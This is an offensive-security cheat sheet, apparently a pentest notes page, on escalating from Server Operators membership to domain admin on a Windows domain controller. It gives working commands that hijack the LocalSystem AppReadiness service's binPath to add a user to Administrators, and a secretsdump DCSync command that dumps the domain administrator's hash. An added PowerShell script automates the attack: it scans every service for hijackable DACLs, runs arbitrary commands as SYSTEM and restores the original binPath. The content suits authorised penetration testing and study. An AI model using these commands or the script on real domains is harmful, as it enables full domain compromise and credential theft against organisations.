
Server Operators

Server Operators is a built-in group (SID S-1-5-32-549) that exists on domain controllers. It is meant to let operators administer a DC without being full Administrators: members can log on locally to the DC, create and delete shares, start and stop services, back up and restore files (they hold SeBackupPrivilege and SeRestorePrivilege), format disks and shut the machine down. The part that matters for privilege escalation is service control: by default Server Operators have full control over a number of services on a DC, AppReadiness among them, and those services run as LocalSystem. A member can change the binary path of such a service and start it, which runs an arbitrary command as SYSTEM on the DC; the same position also allows replacing executables that a privileged service or scheduled task runs, or using the backup/restore privileges to read files a normal user cannot. Membership in this group on a DC should therefore be treated as a path to full domain compromise.


Enumeration

# Query the service configuration. Note BINARY_PATH_NAME (needed later to restore the service)
# and SERVICE_START_NAME (AppReadiness runs as LocalSystem)
sc qc AppReadiness

# We can use PsService.exe from the Sysinternals suite to check the service's DACL in readable form
# https://download.sysinternals.com/files/PSTools.zip
C:\Path\To\PsService.exe security AppReadiness

# Look for an entry granting BUILTIN\Server Operators (S-1-5-32-549) full control, or at least
# SERVICE_CHANGE_CONFIG and SERVICE_START. If we have those rights over the service, we can abuse them.

Abuse

# Check who is currently in the Administrators group. On a DC there is no local SAM: this is the
# domain's Builtin\Administrators group, so adding a user here gives domain-wide admin rights.
net localgroup Administrators

# Add 'rezydev' to the Administrators group. The service account is LocalSystem, so the command runs as SYSTEM.
sc config AppReadiness binPath= "cmd /c net localgroup Administrators rezydev /add"

# Start the service. sc reports an error (cmd.exe is not a real service binary and never signals
# that it is running, so the SCM times out with error 1053), but the command has already executed by then.
sc start AppReadiness

# Our user should now be part of the Administrators group; re-run 'net localgroup Administrators' to confirm.
# Afterwards, restore the original binPath recorded from 'sc qc AppReadiness' so the service still works.

# With Administrators membership on the DC we can also dump the NTDS.dit database remotely (DCSync over DRSUAPI).
# secretsdump takes [domain/]user[:password]@target and prompts for the password if it is omitted;
# -just-dc-user limits the dump to a single account.
python3 /path/to/secretsdump.py srvadm@10.10.10.10 -just-dc-user administrator
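The enumeration and abuse steps above, put together as an added PowerShell example (this is not code from the original page). It parses the SDDL that `sc.exe sdshow` prints for every service, reports the ones whose DACL lets BUILTIN\Server Operators both reconfigure and start them, and then performs the binPath hijack while recording and restoring the original binary path. Assumptions: it runs on the DC in Windows PowerShell 5.1 or later as a Server Operators member, `sc.exe` is on the PATH, the access-right constants are taken from winsvc.h, and the service name and the user 'rezydev' are the page's own placeholder values. The two SDDL strings at the end are constructed for an offline sanity check, not captured from a real host.

```powershell
# Service access rights from winsvc.h (not from the page)
$SERVICE_CHANGE_CONFIG = 0x0002
$SERVICE_START         = 0x0010
$SERVICE_ALL_ACCESS    = 0xF01FF
$GENERIC_ALL           = 0x10000000
$ServerOperatorsSid    = 'S-1-5-32-549'   # BUILTIN\Server Operators, written as 'SO' in SDDL

# Return the service's security descriptor as the SDDL string that 'sc sdshow' prints.
function Get-ServiceSddl {
    param([Parameter(Mandatory)][string]$Name)
    $lines = & sc.exe sdshow $Name 2>$null
    return ($lines | Where-Object { $_ -match '^[DOGS]:' } | Select-Object -First 1)
}

# Decide from an SDDL string whether Server Operators can change the binPath and start the service.
function Test-ServerOperatorsCanHijack {
    param([Parameter(Mandatory)][string]$Sddl)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        # Only allow ACEs for the Server Operators SID are interesting
        if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
        if ($ace.SecurityIdentifier.Value -ne $ServerOperatorsSid) { continue }
        $mask = $ace.AccessMask
        if (($mask -band $GENERIC_ALL) -ne 0) { return $true }
        if (($mask -band $SERVICE_ALL_ACCESS) -eq $SERVICE_ALL_ACCESS) { return $true }
        if ((($mask -band $SERVICE_CHANGE_CONFIG) -ne 0) -and (($mask -band $SERVICE_START) -ne 0)) { return $true }
    }
    return $false
}

# Scan every installed service and report the ones a Server Operators member can hijack.
function Find-HijackableServices {
    foreach ($svc in Get-Service) {
        $sddl = Get-ServiceSddl -Name $svc.Name
        if ($sddl -and (Test-ServerOperatorsCanHijack -Sddl $sddl)) {
            [pscustomobject]@{ Name = $svc.Name; Status = $svc.Status; Sddl = $sddl }
        }
    }
}

# Run $Command under the service's account (LocalSystem for AppReadiness), then restore the original binPath.
function Invoke-ServiceBinPathHijack {
    param([Parameter(Mandatory)][string]$Service,
          [Parameter(Mandatory)][string]$Command)
    # Record BINARY_PATH_NAME from 'sc qc' so the service can be put back afterwards
    $line = & sc.exe qc $Service | Where-Object { $_ -match 'BINARY_PATH_NAME' } | Select-Object -First 1
    if (-not $line) { throw "Could not read the binPath of $Service" }
    $original = $line -replace '^\s*BINARY_PATH_NAME\s*:\s*', ''

    & sc.exe config $Service binPath= "cmd /c $Command" | Out-Null
    # The start fails (cmd.exe never reports SERVICE_RUNNING, so the SCM returns error 1053),
    # but the command line has already been executed as the service account by then.
    & sc.exe start $Service | Out-Null
    Start-Sleep -Seconds 3
    & sc.exe config $Service binPath= $original | Out-Null
    return $original
}

# Offline sanity check on constructed SDDL strings (not captured from a real host):
# the first grants SO full control (CCLCSWRPWPDTLOCRSDRCWDWO = 0xF01FF), the second only query rights.
Test-ServerOperatorsCanHijack -Sddl 'D:(A;;CCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;CCLCSWLOCRRC;;;IU)'
Test-ServerOperatorsCanHijack -Sddl 'D:(A;;CCLCSWLOCRRC;;;SO)'

# Usage on the DC, with the page's example service and user:
# Find-HijackableServices | Format-Table Name, Status
# Invoke-ServiceBinPathHijack -Service AppReadiness -Command 'net localgroup Administrators rezydev /add'
# net localgroup Administrators
```

`Find-HijackableServices` is slower than a single `sc sdshow` because it shells out once per service, but it removes the guesswork of picking a service by name: on a DC the default DACLs give Server Operators full control over more than just AppReadiness, and the scan shows all of them. The hijack function only sleeps a few seconds before restoring the binPath; if the command you run takes longer, increase the delay so the restore does not happen while it is still executing.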